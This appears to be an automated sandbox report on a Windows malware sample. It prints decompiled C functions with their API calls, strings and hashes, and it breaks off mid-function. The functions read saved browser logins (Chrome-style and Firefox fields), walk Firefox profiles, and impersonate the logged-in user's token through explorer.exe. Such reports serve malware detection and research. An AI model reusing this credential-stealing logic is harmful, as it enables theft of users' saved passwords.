Function 0040BEFE, Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BEFE(void* __eax, void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _t49;
				int _t62;
				int _t76;
				void* _t79;

				_t79 = __ecx;
				if(_a16 != 0) {
					_t49 = _a16;
					if( *0x419158 < _t49 &&  *0x41915c < _t49 &&  *0x419160 < _t49) {
						E0040B1AB(_a12,  *0x419158,  &_v8,  &_v12,  &_v16);
						E0040B1AB(_a12,  *0x419160,  &_v20,  &_v24,  &_v28);
						_t49 = E0040B1AB(_a12,  *0x41915c,  &_v32,  &_v36,  &_v40);
						if(_v8 != 0 && _v32 != 0) {
							_v44 = E004017EC(_v8 + 1);
							_t62 = E00401823(_v16, _v44, _v8);
							_v48 = 0;
							_v52 = 0;
							if( *0x415824 != 0) {
								if( *0x415824 != 1) {
									if( *0x415824 == 2) {
										_t62 = 0;
									}
								} else {
									_t62 = StrCmpNIA(_v44, "ftp.", lstrlenA("ftp."));
								}
							} else {
								_t76 = StrCmpNIA(_v44, "ftp://", lstrlenA("ftp://"));
								if(_t76 != 0) {
									_t76 = StrCmpNIA(_v44, "http://", lstrlenA("http://"));
								}
								_t62 = _t76;
								if(_t62 != 0) {
									_t62 = StrCmpNIA(_v44, "https://", lstrlenA("https://"));
								}
							}
							if(_t62 == 0) {
								if(_v20 != 0) {
									_v48 = E00408FA6(_t79, _v28, _v20);
								}
								_v52 = E00408FA6(_t79, _v40, _v32);
								if(_v44 != 0 && _v52 != 0) {
									E00401486(_a8, _a20);
									E004014E8(_a8, _v44);
									E004014E8(_a8, _v48);
									E004014E8(_a8, _v52);
								}
							}
							E004017D5(_v48);
							E004017D5(_v52);
							return E004017D5(_v44);
						}
					}
					return _t49;
				} else {
					return __eax;
				}
			}

0x0040befe
0x0040bf08
0x0040bf0e
0x0040bf17
0x0040bf4a
0x0040bf64
0x0040bf7e
0x0040bf87
0x0040bfa1
0x0040bfad
0x0040bfb2
0x0040bfb9
0x0040bfc7
0x0040c022
0x0040c045
0x0040c047
0x0040c047
0x0040c024
0x0040c037
0x0040c037
0x0040bfc9
0x0040bfe1
0x0040bfe3
0x0040bff8
0x0040bff8
0x0040bffd
0x0040bfff
0x0040c014
0x0040c014
0x0040c019
0x0040c04b
0x0040c051
0x0040c05e
0x0040c05e
0x0040c06c
0x0040c073
0x0040c081
0x0040c08c
0x0040c097
0x0040c0a2
0x0040c0a2
0x0040c073
0x0040c0aa
0x0040c0b2
0x00000000
0x0040c0ba
0x0040bf87
0x0040c0c0
0x0040bf0b
0x0040bf0b
0x0040bf0b

APIs

lstrlenA.KERNEL32(ftp://,?,?,00000000,00000001), ref: 0040BFCE
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFDC
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFEA
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040BFF8
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C006
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000001), ref: 0040C014

Strings

ftp., xrefs: 0040C024, 0040C02F
https://, xrefs: 0040C001, 0040C00C
http://, xrefs: 0040BFE5, 0040BFF0
ftp://, xrefs: 0040BFC9, 0040BFD4

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen
String ID: ftp.$ftp://$http://$https://
API String ID: 1659193697-2878239594
Opcode ID: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
Instruction ID: 2e0af54665fa65f75f976fb34723a380399be05cd310afd3f545fa98bd27941c
Opcode Fuzzy Hash: 2ceeb25bf737fe7d7565a17e9daf5e1d3cf8b9acac254303795ed114300c450e
Instruction Fuzzy Hash: C941FC7280010AEBDF11AFE1DD45AEE7BB9AB08314F14823BF510B11B1D77D49A0EB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402D57, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402D57(void* __ebx) {
				int _t25;
				void* _t33;
				void* _t36;
				void* _t45;
				void* _t49;
				int _t51;
				void* _t52;

				_t49 = __ebx;
				while(1) {
					L15:
					while(1) {
						L17:
						_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
						L1:
						if(_t25 != 0) {
							L2:
							if(StrStrIA(_t52 - 0x110, "explorer.exe") == 0) {
								L17:
								_t25 = Process32Next( *(_t52 - 0x138), _t52 - 0x134);
								goto L1;
							} else {
								L3:
								 *(_t52 - 0x13c) = 0;
								_t33 =  *0x4143d5( *(_t52 - 0x12c), _t52 - 0x13c);
								_t51 =  *(_t52 - 0x13c);
								if(_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc))) {
									continue;
								} else {
									L5:
									_t36 = OpenProcess(0x2000000, 0,  *(_t52 - 0x12c));
									if(_t36 == 0) {
										continue;
									} else {
										L6:
										 *(_t52 - 8) = _t36;
										if(OpenProcessToken( *(_t52 - 8), 0x201eb, _t52 - 4) == 0) {
											CloseHandle( *(_t52 - 8));
											continue;
											do {
												do {
													do {
														goto L17;
													} while (StrStrIA(_t52 - 0x110, "explorer.exe") == 0);
													goto L3;
												} while (_t33 == 0 || _t51 !=  *((intOrPtr*)(_t52 - 0xc)));
												goto L5;
											} while (_t36 == 0);
											goto L6;
										} else {
											if(ImpersonateLoggedOnUser( *(_t52 - 4)) == 0) {
												CloseHandle( *(_t52 - 4));
												CloseHandle( *(_t52 - 8));
												goto L15;
											} else {
												_t49 = _t49 + 1;
												 *(_t52 - 0x140) = 0;
												_t45 = _t52 - 0x140;
												_push(_t45);
												_push(0xf003f);
												L00410E12();
												if(_t45 == 0 &&  *(_t52 - 0x140) != 0) {
													 *0x4140fe =  *(_t52 - 0x140);
												}
												if( *((intOrPtr*)(_t52 + 8)) != 0) {
													 *__eax =  *(_t52 - 4);
												}
											}
										}
									}
								}
							}
						}
						CloseHandle( *(_t52 - 0x138));
						return _t49;
					}
				}
			}

0x00402d57
0x00402d69
0x00402d69
0x00402d73
0x00402d73
0x00402d80
0x00402c7f
0x00402c81
0x00402c87
0x00402c9a
0x00402d73
0x00402d80
0x00000000
0x00402ca0
0x00402ca0
0x00402ca0
0x00402cb7
0x00402cbd
0x00402cc5
0x00000000
0x00402cd4
0x00402cd4
0x00402ce6
0x00402ce8
0x00000000
0x00402cee
0x00402cee
0x00402cee
0x00402d05
0x00402d6e
0x00402d6e
0x00402d73
0x00402d73
0x00402d73
0x00000000
0x00000000
0x00000000
0x00402d73
0x00000000
0x00402d73
0x00000000
0x00402d07
0x00402d12
0x00402d5c
0x00402d64
0x00000000
0x00402d14
0x00402d14
0x00402d15
0x00402d1f
0x00402d25
0x00402d26
0x00402d2b
0x00402d32
0x00402d43
0x00402d43
0x00402d4e
0x00402d53
0x00402d53
0x00402d55
0x00402d12
0x00402d05
0x00402ce8
0x00402cc5
0x00402c9a
0x00402d90
0x00402d99
0x00402d99
0x00402d73

APIs

StrStrIA.SHLWAPI(?,explorer.exe,?,00000128,00000002,00000000), ref: 00402C93
ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe,?,00000128,00000002,00000000), ref: 00402CB7
OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402CE1
OpenProcessToken.ADVAPI32(00410B93,000201EB,00410C2C,02000000,00000000,?), ref: 00402CFD
ImpersonateLoggedOnUser.ADVAPI32(00410C2C), ref: 00402D0A
RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402D2B
CloseHandle.KERNEL32(00410C2C), ref: 00402D5C
CloseHandle.KERNEL32(00410B93,00410C2C), ref: 00402D64
CloseHandle.KERNEL32(00410B93), ref: 00402D6E
Process32Next.KERNEL32 ref: 00402D80
CloseHandle.KERNEL32(?,?,00000128,00000002,00000000), ref: 00402D90

Strings

explorer.exe, xrefs: 00402C87

Memory Dump Source

Source File: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
String ID: explorer.exe
API String ID: 3144406365-3187896405
Opcode ID: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction ID: b299d969079444cf023299e81dd2094d9188d3462d9269bcd78f4557cfd88060
Opcode Fuzzy Hash: aef6317e5045ecaeae95ce1e29d41b5616d0a15dd4b1757b2ee98fb37c85f866
Instruction Fuzzy Hash: C7213A72A00518EBDF229B61DD4ABED7A74AF04304F1440B6A104B51E1E7BC9E91DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA2E, Relevance: 15.1, APIs: 7, Strings: 3, Instructions: 140
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040BA2E(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				void* _v40;
				void* _v44;
				char _v48;
				void* _v52;
				int _v56;
				char* _v60;
				void* _t55;
				void* _t56;
				int _t77;
				int _t78;

				_t55 = __eax;
				if(_a16 == 0 ||  *0x41442d == 0) {
					return _t55;
				} else {
					_t56 = _a16;
					if( *0x41914c < _t56 &&  *0x419150 < _t56 &&  *0x419154 < _t56) {
						E0040B1AB(_a12,  *0x41914c,  &_v8,  &_v12,  &_v16);
						E0040B1AB(_a12,  *0x419154,  &_v20,  &_v24,  &_v28);
						E0040B1AB(_a12,  *0x419150,  &_v32,  &_v36,  &_v40);
						_push(_v32);
						_pop( *_t16);
						_push(_v40);
						_pop( *_t18);
						_v52 = 0;
						_t56 =  *0x41442d( &_v48, 0, 0, 0, 0, 1,  &_v56);
						if(_t56 != 0 && _v52 != 0 && _v56 <= _v32) {
							asm("cld");
							asm("jecxz 0x4");
							memcpy(_v40, _v52, _v56);
							_push(_v56);
							_pop( *_t29);
							_t56 = LocalFree(_v52);
							if(_v8 != 0 && _v20 != 0 && _v32 != 0) {
								_v60 = E004017EC(_v8);
								E00401823(_v16, _v60, _v8);
								_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
								if(_t77 != 0) {
									_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
								}
								_t78 = _t77;
								if(_t78 != 0) {
									_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
								}
								if(_t78 == 0) {
									E00401486(_a8, _a20);
									E00401486(_a8,  *0x419148);
									E004014BC(_a8, _v16, _v8);
									E004014BC(_a8, _v28, _v20);
									E004014BC(_a8, _v40, _v32);
								}
								return E004017D5(_v60);
							}
						}
					}
					return _t56;
				}
			}

0x0040ba2e
0x0040ba3a
0x0040ba48
0x0040ba4b
0x0040ba4b
0x0040ba54
0x0040ba87
0x0040baa1
0x0040babb
0x0040bac0
0x0040bac3
0x0040bac6
0x0040bac9
0x0040bacc
0x0040baeb
0x0040baed
0x0040bb09
0x0040bb13
0x0040bb15
0x0040bb17
0x0040bb1a
0x0040bb20
0x0040bb29
0x0040bb4b
0x0040bb57
0x0040bb74
0x0040bb76
0x0040bb8b
0x0040bb8b
0x0040bb90
0x0040bb92
0x0040bba7
0x0040bba7
0x0040bbae
0x0040bbb6
0x0040bbc4
0x0040bbd2
0x0040bbe0
0x0040bbee
0x0040bbee
0x00000000
0x0040bbf6
0x0040bb29
0x0040baed
0x0040bbfe
0x0040bbfe

APIs

LocalFree.KERNEL32(00000000,?), ref: 0040BB20
lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB61
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB6F
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB7D
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB8B
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB99
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA7

Strings

https://, xrefs: 0040BB94, 0040BB9F
ftp://, xrefs: 0040BB5C, 0040BB67
http://, xrefs: 0040BB78, 0040BB83

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: ftp://$http://$https://
API String ID: 1884169789-2804853444
Opcode ID: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction ID: bf0502dff25623896b3ecf7b6da0d74d92ec6f4b9260b97e51de09929ef1935b
Opcode Fuzzy Hash: 95c9bc2d148bde0b4b59229255769488340ea3422c61917c09e4e27456b1ab44
Instruction Fuzzy Hash: 9E51E772900209FBDF12AF91ED45EEE7B7AEB48314F108136F510B11A1D7799A90EB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040B973, Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040B973(CHAR* _a4, intOrPtr _a8) {
				char* _t14;
				int _t17;
				int _t20;
				CHAR* _t29;

				E0040282C(_a4);
				_t14 = StrStrIA(_a4, 0x415c5b);
				if(_t14 != 0) {
					 *_t14 = 0;
					E0040282C(_a4);
					_t29 = "CONSTRAINT";
					while(1) {
						_t17 = lstrcmpiA(_t29, _a4);
						if(_t17 == 0) {
							break;
						}
						asm("cld");
						asm("repne scasb");
						if( *_t29 != 0) {
							continue;
						} else {
							_t20 = lstrlenA(_a4);
							if(_t20 != 0) {
								if(lstrcmpiA(_a4, "origin_url") == 0) {
									_push(_a8);
									_pop( *0x41914c);
								}
								if(lstrcmpiA(_a4, "password_value") == 0) {
									_push(_a8);
									_pop( *0x419150);
								}
								if(lstrcmpiA(_a4, "username_value") == 0) {
									_push(_a8);
									_pop( *0x419154);
								}
								return 1;
							} else {
								return _t20;
							}
						}
						goto L15;
					}
					return _t17;
				} else {
					return _t14;
				}
				L15:
			}

0x0040b97a
0x0040b98c
0x0040b98e
0x0040b995
0x0040b99b
0x0040b9a0
0x0040b9a5
0x0040b9ae
0x0040b9b0
0x00000000
0x00000000
0x0040b9b7
0x0040b9bf
0x0040b9c3
0x00000000
0x0040b9c5
0x0040b9cd
0x0040b9cf
0x0040b9e5
0x0040b9e7
0x0040b9ea
0x0040b9ea
0x0040b9ff
0x0040ba01
0x0040ba04
0x0040ba04
0x0040ba19
0x0040ba1b
0x0040ba1e
0x0040ba1e
0x0040ba2b
0x0040b9d3
0x0040b9d3
0x0040b9d3
0x0040b9cf
0x00000000
0x0040b9c3
0x0040b9b4
0x0040b992
0x0040b992
0x0040b992
0x00000000

APIs

Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860

StrStrIA.SHLWAPI(?,00415C5B), ref: 0040B987
lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040B9A9

Strings

CONSTRAINT, xrefs: 0040B9A0, 0040B9A8
origin_url, xrefs: 0040B9D6
username_value, xrefs: 0040BA0A
password_value, xrefs: 0040B9F0

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$origin_url$password_value$username_value
API String ID: 3649823140-2401479949
Opcode ID: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
Instruction ID: d1a5d0e1c88d5ff09c1e1cca62af422fdfc66f56267979ae8e6772905978206e
Opcode Fuzzy Hash: 511362c122ae1bb3d44918b29f558ac21b14b782be5ce1ccac998998cca95872
Instruction Fuzzy Hash: D7118677210505F9CF522F65DC02ADE3E51EB66398B008137F519A81A1E3BDCDD1968C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BE43, Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040BE43(CHAR* _a4, intOrPtr _a8) {
				char* _t14;
				int _t17;
				int _t20;
				CHAR* _t29;

				E0040282C(_a4);
				_t14 = StrStrIA(_a4, 0x415c5b);
				if(_t14 != 0) {
					 *_t14 = 0;
					E0040282C(_a4);
					_t29 = "CONSTRAINT";
					while(1) {
						_t17 = lstrcmpiA(_t29, _a4);
						if(_t17 == 0) {
							break;
						}
						asm("cld");
						asm("repne scasb");
						if( *_t29 != 0) {
							continue;
						} else {
							_t20 = lstrlenA(_a4);
							if(_t20 != 0) {
								if(lstrcmpiA(_a4, "hostname") == 0) {
									_push(_a8);
									_pop( *0x419158);
								}
								if(lstrcmpiA(_a4, "encryptedPassword") == 0) {
									_push(_a8);
									_pop( *0x41915c);
								}
								if(lstrcmpiA(_a4, "encryptedUsername") == 0) {
									_push(_a8);
									_pop( *0x419160);
								}
								return 1;
							} else {
								return _t20;
							}
						}
						goto L15;
					}
					return _t17;
				} else {
					return _t14;
				}
				L15:
			}

0x0040be4a
0x0040be5c
0x0040be5e
0x0040be65
0x0040be6b
0x0040be70
0x0040be75
0x0040be7e
0x0040be80
0x00000000
0x00000000
0x0040be87
0x0040be8f
0x0040be93
0x00000000
0x0040be95
0x0040be9d
0x0040be9f
0x0040beb5
0x0040beb7
0x0040beba
0x0040beba
0x0040becf
0x0040bed1
0x0040bed4
0x0040bed4
0x0040bee9
0x0040beeb
0x0040beee
0x0040beee
0x0040befb
0x0040bea3
0x0040bea3
0x0040bea3
0x0040be9f
0x00000000
0x0040be93
0x0040be84
0x0040be62
0x0040be62
0x0040be62
0x00000000

APIs

Part of subcall function 0040282C: lstrlenA.KERNEL32(?), ref: 00402860

StrStrIA.SHLWAPI(?,00415C5B), ref: 0040BE57
lstrcmpiA.KERNEL32(CONSTRAINT,?,?,00415C5B), ref: 0040BE79

Strings

CONSTRAINT, xrefs: 0040BE70, 0040BE78
encryptedPassword, xrefs: 0040BEC0
encryptedUsername, xrefs: 0040BEDA
hostname, xrefs: 0040BEA6

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpilstrlen
String ID: CONSTRAINT$encryptedPassword$encryptedUsername$hostname
API String ID: 3649823140-2971371156
Opcode ID: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
Instruction ID: c71311dfb796d292e15c99594d8fb0fbbefb30d41f24959de37fc513c87e5bbe
Opcode Fuzzy Hash: 3b6e553b86d3743abcf43c6fed1d443a023b2c038be3cf22ddb1bdf73287225e
Instruction Fuzzy Hash: 8A116077210505F6CF122F65EC02ACF3E51EB66398B008137F919A81A1E3BD8DD196CC

Uniqueness

Uniqueness Score: -1.00%

Function 0041098D, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 135
stringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0041098D(signed int __eax, void* __ecx, signed int __edx) {
				void* _v8;
				char* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v36;
				CHAR* _v40;
				char _v44;
				CHAR* _v48;
				CHAR* _t46;
				int _t50;
				CHAR* _t54;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t65;
				int _t68;
				CHAR* _t69;
				CHAR* _t70;
				void* _t71;
				signed int _t73;
				signed int _t74;
				char* _t75;

				_t71 = __ecx;
				_t73 = __edx ^ __eax;
				_t42 = __eax ^ _t73;
				_t74 = _t73 ^ __eax ^ _t73;
				if( *0x414411 == 0 ||  *0x41441d == 0) {
					return 0;
				} else {
					_t69 =  *0x417691; // 0x0
					while(1) {
						_t70 = _t69;
						__eflags = _t70;
						if(_t70 == 0) {
							break;
						}
						E00402AF8(_t42, _t74);
						__eflags =  *0x417695;
						if( *0x417695 == 0) {
							L7:
							_v8 = 0;
							_t46 =  *0x41441d(_t70[4], 0, _t70[4], 2, 0,  &_v8);
							__eflags = _t46;
							if(_t46 == 0) {
								_v12 = E0040294B(_t70[4]);
								_t50 = LCMapStringA(0x400, 0x100, _t70[4], lstrlenA(_t70[4]), _v12, _t49);
								__eflags = _t50;
								if(_t50 == 0) {
									L12:
									E004017D5(_v12);
									_t75 = "r`l`oui`";
									L13:
									_v8 = 0;
									_t54 =  *0x41441d(_t70[4], 0, _t75, 2, 0,  &_v8);
									__eflags = _t54;
									if(_t54 != 0) {
										goto L14;
									}
								} else {
									_v8 = 0;
									_t65 =  *0x41441d(_t70[4], 0, _v12, 2, 0,  &_v8);
									__eflags = _t65;
									if(_t65 == 0) {
										goto L12;
									} else {
										E004017D5(_v12);
										goto L14;
									}
								}
							} else {
								L14:
								_v44 = 0x20;
								_v40 = 1;
								_push(_t70[4]);
								_pop( *_t23);
								_push(_t70[8]);
								_pop( *_t25);
								_v28 = 0;
								_v24 = 0;
								_v20 = 0;
								_v16 = 0;
								_t57 =  &_v44;
								_push(_t57);
								_push(_v8);
								L00410E96();
								__eflags = _t57;
								if(_t57 == 0) {
									_v48 = 0;
								} else {
									__eflags = _v16;
									if(_v16 != 0) {
										_push(_v16);
										_pop( *0x4140fe);
									}
									_v48 = 1;
								}
								_t59 =  *0x414411(_v8);
								_t60 = _t59;
								__eflags = _t59;
								if(__eflags != 0) {
									E004105CE(_t60, _t71, _t74, __eflags);
									__eflags =  *0x414409;
									if( *0x414409 != 0) {
										 *0x414409();
									}
									 *0x4140fe = 0x80000001;
								}
								__eflags = _v48;
								if(_v48 != 0) {
									_push(_v16);
									_push(_v8);
									L00410E9C();
								}
								CloseHandle(_v8);
							}
							asm("cld");
							_t42 = 0;
							_t71 = 0xffffffff;
							asm("repne scasb");
							__eflags =  *_t75;
							if( *_t75 != 0) {
								goto L13;
							}
						} else {
							_t68 = lstrcmpiA( *0x417695, _t70[4]);
							_t42 = _t68;
							__eflags = _t68;
							if(_t68 != 0) {
								goto L7;
							} else {
							}
						}
						_t69 =  *_t70;
					}
					return 1;
				}
			}

0x0041098d
0x00410995
0x00410997
0x00410999
0x004109a2
0x004109b2
0x004109b3
0x004109b3
0x00410b4f
0x00410b4f
0x00410b4f
0x00410b51
0x00000000
0x00000000
0x004109be
0x004109c3
0x004109ca
0x004109e3
0x004109e3
0x004109fa
0x00410a00
0x00410a02
0x00410a11
0x00410a2e
0x00410a33
0x00410a35
0x00410a62
0x00410a65
0x00410a6a
0x00410a6f
0x00410a6f
0x00410a84
0x00410a8a
0x00410a8c
0x00000000
0x00000000
0x00410a37
0x00410a37
0x00410a4e
0x00410a54
0x00410a56
0x00000000
0x00410a58
0x00410a5b
0x00000000
0x00410a5b
0x00410a56
0x00410a04
0x00410a92
0x00410a92
0x00410a99
0x00410aa0
0x00410aa3
0x00410aa6
0x00410aa9
0x00410aac
0x00410ab3
0x00410aba
0x00410ac1
0x00410ac8
0x00410acb
0x00410acc
0x00410acf
0x00410ad4
0x00410ad6
0x00410af0
0x00410ad8
0x00410ad8
0x00410adc
0x00410ade
0x00410ae1
0x00410ae1
0x00410ae7
0x00410ae7
0x00410afa
0x00410b00
0x00410b00
0x00410b02
0x00410b04
0x00410b09
0x00410b10
0x00410b12
0x00410b12
0x00410b18
0x00410b18
0x00410b22
0x00410b26
0x00410b28
0x00410b2b
0x00410b2e
0x00410b2e
0x00410b36
0x00410b36
0x00410b3b
0x00410b3c
0x00410b3e
0x00410b43
0x00410b45
0x00410b47
0x00000000
0x00000000
0x004109cc
0x004109d5
0x004109da
0x004109da
0x004109dc
0x00000000
0x00000000
0x004109de
0x004109dc
0x00410b4d
0x00410b4d
0x00410b5f
0x00410b5f

APIs

lstrcmpiA.KERNEL32(?), ref: 004109D5
lstrlenA.KERNEL32(?,?), ref: 00410A17
LCMapStringA.KERNEL32(00000400,00000100,?,00000000,?,00000000,?,?), ref: 00410A2E
LoadUserProfileA.USERENV(00000000,00000020,?,?), ref: 00410ACF
UnloadUserProfile.USERENV(00000000,00000000), ref: 00410B2E
CloseHandle.KERNEL32(00000000), ref: 00410B36

Strings

r`l`oui`, xrefs: 00410A6A, 00410A7E
, xrefs: 00410A92

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ProfileUser$CloseHandleLoadStringUnloadlstrcmpilstrlen
String ID: $r`l`oui`
API String ID: 1092964125-956245557
Opcode ID: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction ID: 97e36a9f464fd7594aaf26f4fe361f5543e1ef418d0b81fc890e2415056c999a
Opcode Fuzzy Hash: e8c680e9c729fbd071ccc07f1bc87b888f040c63c80d600780040c0011251876
Instruction Fuzzy Hash: 54516E71A00208EFEF119FA1DD46BDEBA75EB04318F14C066E510A91E2D7F99AD0DF29

Uniqueness

Uniqueness Score: -1.00%

Function 00409713, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00409713(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				void* _t33;
				void* _t35;
				intOrPtr _t38;
				char* _t57;
				char* _t61;
				char* _t62;
				CHAR* _t63;

				_t33 = E00401E9C(_a8);
				if(_t33 != 0) {
					_t35 = E00401E9C(_a12);
					if(_t35 != 0) {
						if(E004024D7(_a8) != 0) {
							_t38 = E00401D15(_a8, 0);
						} else {
							_t38 = E00401D15(_a8, "\\");
						}
						_v16 = _t38;
						_v12 = E00401D15(_v16, "profiles.ini");
						_v8 = E004017EC(0xfdea);
						_v20 = E004017EC(0x1000);
						if(E00401E53(_v12) != 0 && GetPrivateProfileSectionNamesA(_v8, 0xfde8, _v12) > 2) {
							_t63 = _v8;
							if( *_t63 != 0) {
								do {
									if(StrStrIA(_t63, "Profile") != 0 && GetPrivateProfileStringA(_t63, "Path", 0x4140dc, _v20, 0xfff, _v12) != 0) {
										if(GetPrivateProfileIntA(_t63, "IsRelative", 1, _v12) != 1) {
											E004096FB(_a4, _v20, _a12);
										} else {
											_t57 = E00401D15(_v16, _v20);
											_push(_t57);
											_t61 = _t57;
											while(1) {
												_t62 = _t61;
												if(_t62 == 0 ||  *_t62 == 0) {
													break;
												}
												if( *_t62 == 0x2f) {
													 *_t62 = 0x5c;
												}
												_t61 = _t62 + 1;
											}
											E004096FB(_a4, _t57, _a12);
											E004017D5();
										}
									}
									asm("cld");
									asm("repne scasb");
								} while ( *_t63 != 0);
							}
						}
						E004017D5(_v16);
						E004017D5(_v20);
						E004017D5(_v12);
						E004017D5(_v8);
						return E004096FB(_a4, _a8, _a12);
					} else {
						return _t35;
					}
				} else {
					return _t33;
				}
			}

0x00409722
0x00409724
0x00409733
0x00409735
0x00409746
0x0040975c
0x00409748
0x00409750
0x00409750
0x00409761
0x00409771
0x0040977e
0x0040978b
0x00409798
0x004097b7
0x004097bd
0x004097c3
0x004097d0
0x00409804
0x00409844
0x00409806
0x0040980c
0x00409811
0x00409812
0x0040981f
0x0040981f
0x00409821
0x00000000
0x00000000
0x00409819
0x0040981b
0x0040981b
0x0040981e
0x0040981e
0x0040982f
0x00409834
0x00409834
0x00409804
0x00409849
0x00409851
0x00409853
0x004097c3
0x004097bd
0x0040985e
0x00409866
0x0040986e
0x00409876
0x0040988b
0x00409739
0x00409739
0x00409739
0x00409728
0x00409728
0x00409728

Strings

IsRelative, xrefs: 004097F6
Profile, xrefs: 004097C3
Path, xrefs: 004097E2
profiles.ini, xrefs: 00409764

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 0-4107377610
Opcode ID: d5eb002496591747a9483898efa8975ea6d74f7974628be87dc4108a6ce88e32
Instruction ID: 9f854c8f064d301336fa07c1f25567edbfe6f4ad31a08e24bdafbc402817c31b
Opcode Fuzzy Hash: d5eb002496591747a9483898efa8975ea6d74f7974628be87dc4108a6ce88e32
Instruction Fuzzy Hash: 4B413D72910109BACF223FA1DC42AAE7B72AF55714F24817BF511751F3D77D4DA0AA08

Uniqueness

Uniqueness Score: -1.00%

Function 004039C1, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004039C1(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
				char* _v8;
				int _v12;
				char*** _v16;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t54;
				void* _t66;
				char* _t81;
				char* _t82;
				void* _t83;
				char* _t86;
				char* _t87;
				void* _t88;

				_t72 = __edx;
				_v8 = E004017EC(0x7d00);
